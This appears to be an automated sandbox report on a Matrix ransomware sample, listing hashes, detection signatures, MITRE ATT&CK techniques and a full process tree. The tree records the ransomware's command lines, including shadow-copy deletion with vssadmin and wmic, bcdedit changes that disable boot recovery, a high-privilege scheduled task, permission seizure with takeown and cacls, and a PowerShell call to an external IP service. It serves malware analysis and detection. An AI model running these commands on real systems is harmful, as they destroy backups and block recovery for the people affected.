Analysis

max time kernel: 4294211s
max time network: 127s
platform: windows7_x64
resource: win7-20220223-en
submitted: 06-03-2022 04:47

Static task: static1

Behavioral task: behavioral1
  Sample: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
  Resource: win7-20220223-en

Behavioral task: behavioral2
  Sample: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
  Resource: win10v2004-en-20220113

General

Target: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
Size: 2.6MB
MD5: 1f987de3da76b532d5eb4dc0a8e07edc
SHA1: 2002718bb7d81d6661892c6f2631df27eac89f61
SHA256: 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5
SHA512: 7db16f026aee59ff24e30e7e4ce9a0c7a0d6575b5dc1e7907169fd0fe53a5576deb21e16e7a88d053fe6ea6cec035458539e180e4caac6b46f5e612ce4486310

Malware Config

Extracted: http://myexternalip.com/raw

Signatures

Matrix Ransomware (64 IoCs)
Targeted ransomware with information collection and encryption functionality.

suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity
suricata: ET MALWARE MSIL/Matrix Ransomware CnC Activity

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  pid   Process
  892   bcdedit.exe
  1280  bcdedit.exe

Blocklisted process makes network request (1 IoC)
  flow  pid  Process
  10    512  powershell.exe

Drops file in Drivers directory (1 IoC)
  description   ioc                                          Process
  File created  C:\Windows\system32\Drivers\PROCEXP152.SYS   DhyQfpmw64.exe

Executes dropped EXE (3 IoCs)
  pid   Process
  1624  NWSO8eY2.exe
  1604  DhyQfpmw.exe
  1684  DhyQfpmw64.exe

Modifies extensions of user files (1 IoC)
Ransomware generally changes the extension on encrypted files.
  description                   ioc                                        Process
  File opened for modification  C:\Users\Admin\Pictures\ConnectDeny.tiff   72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe

Sets service image path in registry (2 TTPs)

  resource                                     yara_rule
  behavioral1/files/0x000800000001232a-69.dat  upx
  behavioral1/files/0x000800000001232a-68.dat  upx
  behavioral1/files/0x000800000001232a-70.dat  upx

Loads dropped DLL (4 IoCs)
  pid   Process
  756   72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
  756   72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe
  1600  cmd.exe
  1604  DhyQfpmw.exe

Modifies file permissions (1 TTP, 1 IoC)
  pid   Process
  1784  takeown.exe

Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.

Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  9     myexternalip.com

Drops file in System32 directory (1 IoC)
  description                   ioc                                                                                                                          Process
  File opened for modification  C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk  powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                            Process
  Set value (str)  \REGISTRY\USER\S-1-5-21-1405931862-909307831-4085185274-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\3STAYjlo.bmp"  reg.exe

Drops file in Program Files directory (64 IoCs)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid  Process
  840  schtasks.exe

Interacts with shadow copies (2 TTPs, 2 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
  pid  Process
  684  vssadmin.exe
  224  vssadmin.exe

Suspicious behavior: EnumeratesProcesses (7 IoCs)
  pid   Process
  512   powershell.exe
  1684  DhyQfpmw64.exe
  1684  DhyQfpmw64.exe
  1684  DhyQfpmw64.exe
  1464  powershell.exe
  1464  powershell.exe
  1464  powershell.exe

Suspicious behavior: LoadsDriver (1 IoC)
  pid   Process
  1684  DhyQfpmw64.exe

Suspicious use of AdjustPrivilegeToken (47 IoCs)

Suspicious use of WriteProcessMemory (64 IoCs)

description | pid | Process | procid_target | calls
PID 756 wrote to memory of 1056 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 28 | 4
PID 756 wrote to memory of 1624 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 30 | 4
PID 756 wrote to memory of 1976 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 34 | 4
PID 1976 wrote to memory of 512 | 1976 | cmd.exe | 36 | 4
PID 756 wrote to memory of 1056 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 37 | 4
PID 756 wrote to memory of 936 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 40 | 4
PID 936 wrote to memory of 1232 | 936 | cmd.exe | 41 | 4
PID 1056 wrote to memory of 436 | 1056 | cmd.exe | 42 | 4
PID 1056 wrote to memory of 1280 | 1056 | cmd.exe | 43 | 4
PID 756 wrote to memory of 1716 | 756 | 72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe | 44 | 4
PID 1716 wrote to memory of 456 | 1716 | cmd.exe | 46 | 4
PID 1056 wrote to memory of 388 | 1056 | cmd.exe | 47 | 4
PID 1716 wrote to memory of 1124 | 1716 | cmd.exe | 48 | 4
PID 1716 wrote to memory of 1784 | 1716 | cmd.exe | 49 | 4
PID 1716 wrote to memory of 1600 | 1716 | cmd.exe | 50 | 4
PID 1600 wrote to memory of 1604 | 1600 | cmd.exe | 51 | 4
Views/modifies file attributes 1 TTPs 1 IoCs
pid | Process
456 | attrib.exe
Processes
-
* C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe (PID 756)
  Command line: "C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe"
  - Matrix Ransomware
  - Modifies extensions of user files
  - Loads dropped DLL
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious use of WriteProcessMemory
  * C:\Windows\SysWOW64\cmd.exe (PID 1056)
    Command line: "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\72c5665c4372dc234d6bc68d0b54987e38b294f0581170409be572dab14d8ff5.exe" "C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe"
  * C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe (PID 1624)
    Command line: "C:\Users\Admin\AppData\Local\Temp\NWSO8eY2.exe" -n
    - Executes dropped EXE
  * C:\Windows\SysWOW64\cmd.exe (PID 1976)
    Command line: "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ma6TWcbo.txt"
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 512)
      Command line: powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  * C:\Windows\SysWOW64\cmd.exe (PID 1056)
    Command line: "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\3STAYjlo.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\reg.exe (PID 436)
      Command line: reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\3STAYjlo.bmp" /f
      - Sets desktop wallpaper using registry
    * C:\Windows\SysWOW64\reg.exe (PID 1280)
      Command line: reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    * C:\Windows\SysWOW64\reg.exe (PID 388)
      Command line: reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  * C:\Windows\SysWOW64\cmd.exe (PID 936)
    Command line: "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\i7qsm92W.vbs"
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\wscript.exe (PID 1232)
      Command line: wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\i7qsm92W.vbs"
      * C:\Windows\SysWOW64\cmd.exe (PID 1464)
        Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat" /sc minute /mo 5 /RL HIGHEST /F
        * C:\Windows\SysWOW64\schtasks.exe (PID 840)
          Command line: schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat" /sc minute /mo 5 /RL HIGHEST /F
          - Creates scheduled task(s)
      * C:\Windows\SysWOW64\cmd.exe (PID 112)
        Command line: "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
        * C:\Windows\SysWOW64\schtasks.exe (PID 1540)
          Command line: schtasks /Run /I /tn DSHCA
  * C:\Windows\SysWOW64\cmd.exe (PID 1716)
    Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\w2KPNC2M.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf""
    - Suspicious use of WriteProcessMemory
    * C:\Windows\SysWOW64\attrib.exe (PID 456)
      Command line: attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Views/modifies file attributes
    * C:\Windows\SysWOW64\cacls.exe (PID 1124)
      Command line: cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf" /E /G Admin:F /C
    * C:\Windows\SysWOW64\takeown.exe (PID 1784)
      Command line: takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf"
      - Modifies file permissions
    * C:\Windows\SysWOW64\cmd.exe (PID 1600)
      Command line: C:\Windows\system32\cmd.exe /c DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      * C:\Users\Admin\AppData\Local\Temp\DhyQfpmw.exe (PID 1604)
        Command line: DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
        - Executes dropped EXE
        - Loads dropped DLL
        * C:\Users\Admin\AppData\Local\Temp\DhyQfpmw64.exe (PID 1684)
          Command line: DhyQfpmw.exe -accepteula "DefaultID.pdf" -nobanner
          - Drops file in Drivers directory
          - Executes dropped EXE
          - Enumerates connected drives
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious behavior: LoadsDriver
          - Suspicious use of AdjustPrivilegeToken
* C:\Windows\system32\taskeng.exe (PID 960)
  Command line: taskeng.exe {9201C9EF-350D-401D-9F9A-1DD3A7BA142A} S-1-5-21-1405931862-909307831-4085185274-1000:GZAATBZA\Admin:Interactive:[1]
  * C:\Windows\SYSTEM32\cmd.exe (PID 1372)
    Command line: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\GCmejp5M.bat"
    * C:\Windows\system32\vssadmin.exe (PID 684)
      Command line: vssadmin Delete Shadows /All /Quiet
      - Interacts with shadow copies
    * C:\Windows\System32\Wbem\WMIC.exe (PID 1488)
      Command line: wmic SHADOWCOPY DELETE
      - Suspicious use of AdjustPrivilegeToken
    * C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1464)
      Command line: powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
      - Drops file in System32 directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      * C:\Windows\system32\vssadmin.exe (PID 224)
        Command line: "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        - Interacts with shadow copies
    * C:\Windows\system32\bcdedit.exe (PID 892)
      Command line: bcdedit /set {default} recoveryenabled No
      - Modifies boot configuration data using bcdedit
    * C:\Windows\system32\bcdedit.exe (PID 1280)
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
    * C:\Windows\system32\schtasks.exe (PID 1488)
      Command line: SCHTASKS /Delete /TN DSHCA /F
* C:\Windows\system32\vssvc.exe (PID 1584)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Persistence
- Hidden Files and Directories (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- File Deletion (2)
- File and Directory Permissions Modification (1)
- Hidden Files and Directories (1)
- Modify Registry (2)